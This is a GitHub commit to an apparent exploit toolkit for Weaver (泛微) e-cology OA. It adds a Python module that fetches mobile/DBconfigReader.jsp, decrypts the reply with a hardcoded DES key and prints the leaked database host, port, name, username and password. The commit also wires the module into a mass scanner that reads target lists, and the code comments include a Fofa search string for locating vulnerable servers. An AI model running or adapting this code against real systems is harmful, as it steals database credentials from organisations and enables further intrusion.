Add E_Cology_Database_Leak

haotiku · Jun 28, 2021 · a3f5f60 · a3f5f60
1 parent c28a811
commit a3f5f60
Show file tree

Hide file tree

Showing 3 changed files with 105 additions and 2 deletions.
diff --git a/README.md b/README.md
@@ -14,12 +14,19 @@
 泛微OA Bsh RCE
 
 泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241
+
+泛微OA E-Cology 数据库配置信息泄漏
 ```
+泛微OA V9 任意文件上传（未完成，测试ing）
 
 先写了这些，也欢迎补充～
 
 其中`/poc`下的利用脚本均可独立使用。
 
+```bash
+python3 poc.py url
+```
+
 ##### Usage:
 
 ```bash
@@ -42,5 +49,6 @@ https://www.o2oxy.cn/3561.html
 
 https://github.com/Henry4E36/weaverSQL
 
+https://github.com/NS-Sp4ce/Weaver-OA-E-cology-Database-Leak
 
 
diff --git a/main.py b/main.py
@@ -4,9 +4,11 @@
 import argparse
 import time
 from pyfiglet import Figlet
+# from  multiprocessing import Pool
+
 
 from poc import E_Bridge_Arbitrary_File_Read, E_Cology_WorkflowServiceXml_RCE, E_Cology_V8_Sql, \
-    Weaver_Common_Ctrl_Upload, Bsh_RCE, WorkflowCenterTreeData_Sql
+    Weaver_Common_Ctrl_Upload, Bsh_RCE, WorkflowCenterTreeData_Sql, E_Cology_Database_Leak
 
 BLUE = '\033[0;36m'
 RED = '\x1b[1;91m'
@@ -89,6 +91,11 @@ def check(url):
     if WorkflowCenterTreeData_Sql.exploit(url) == 'ok':
         result('泛微OA WorkflowCenterTreeData接口SQL注入', url)
 
+    # 泛微OA e-cology 数据库配置信息泄漏
+    print(now_time() + info() + '正在检测泛微OA e-cology 数据库配置信息泄漏漏洞')
+    if E_Cology_Database_Leak.checkVulUrl(url) == 'ok':
+        result('泛微OA 数据库配置信息泄漏漏洞', url)
+
 
 if __name__ == '__main__':
     print(VIOLET + Figlet(font='slant').renderText('WeaverOAExp') + ENDC)
@@ -100,6 +107,7 @@ def check(url):
         os.path.basename(__file__))
     args = parser.parse_args()
     if args.file:
+        # pool = Pool(processes=10)
         f = open(args.file, 'r')
         urls = f.readlines()
         for url in urls:
@@ -108,10 +116,13 @@ def check(url):
                 url += '/'
                 if url[:4] != 'http':
                     url = 'http://' + url
+            # pool.apply_async(check, args=(url,))
             check(url)
+        f.close()
+        # pool.close()
+        # pool.join()
         # 扫描结果
         print(now_time() + info() + '扫描已完成, 若有漏洞将保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')
-        f.close()
 
     elif args.url:
         check(args.url)

diff --git a/poc/E_Cology_Database_Leak.py b/poc/E_Cology_Database_Leak.py
@@ -0,0 +1,84 @@
+# -*- coding: utf-8 -*-
+# 泛微OA E-Cology 数据库配置信息泄漏
+# Fofa:  app="泛微-协同办公OA"
+
+import pyDes
+import requests
+import sys
+import time
+
+BLUE = '\033[0;36m'
+RED = '\x1b[1;91m'
+YELLOW = '\033[33m'
+VIOLET = '\033[1;94m'
+GREEN = '\033[1;32m'
+BOLD = '\033[1m'
+ENDC = '\033[0m'
+
+
+def now_time():
+    return BLUE + time.strftime("[%H:%M:%S] ", time.localtime()) + ENDC
+
+
+def info():
+    return VIOLET + "[INFO] " + ENDC
+
+
+def error():
+    return RED + "[ERROR] " + ENDC
+
+
+def success():
+    return GREEN + "[SUCCESS] " + ENDC
+
+
+def warning():
+    return YELLOW + "[WARNING] " + ENDC
+
+
+headers = {
+    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25'
+}
+
+
+def desdecode(secret_key, s):
+    cipherX = pyDes.des('        ')
+    cipherX.setKey(secret_key)
+    y = cipherX.decrypt(s)
+    return y
+
+
+def checkVulUrl(url):
+    url += 'mobile/DBconfigReader.jsp'
+    try:
+        requests.packages.urllib3.disable_warnings()
+        res = requests.get(url=url, headers=headers, timeout=10, verify=False)
+        if res.status_code != 200:
+            print(now_time() + warning() + '不存在泛微OA E-Cology 数据库配置信息泄漏漏洞')
+        elif res.status_code == 200:
+            print(now_time() + info() + '可能存在泛微OA E-Cology 数据库配置信息泄漏漏洞')
+            res = res.content
+            try:
+                data = desdecode('1z2x3c4v5b6n', res.strip())
+                data = data.strip()
+                dbType = str(data).split(';')[0].split(':')[1]
+                dbUrl = str(data).split(';')[0].split(':')[2].split('//')[1]
+                dbPort = str(data).split(';')[0].split(':')[3]
+                dbName = str(data).split(';')[1].split(',')[0].split('=')[1]
+                dbUser = str(data).split(';')[1].split(',')[1].split('=')[1]
+                dbPass = str(data).split(';')[1].split(',')[2].split('=')[1]
+                print(now_time() + success() + url +
+                      "\n    DBType: {0}\n    DBUrl: {1}\n    DBPort: {2}\n    DBName: {3}\n    DBUser: {4}\n    DBPass: {5}".format(
+                          dbType, dbUrl, dbPort, dbName, dbUser, dbPass))
+                return 'ok'
+            except:
+                print(now_time() + warning() + 'DES解密失败, 可能默认密钥错误, 手动访问进行确认: {}'.format(url))
+    except:
+        print(now_time() + error() + '无法连接到目标')
+
+
+if __name__ == '__main__':
+    url = sys.argv[1]
+    if url[-1] != '/':
+        url += '/'
+    checkVulUrl(url)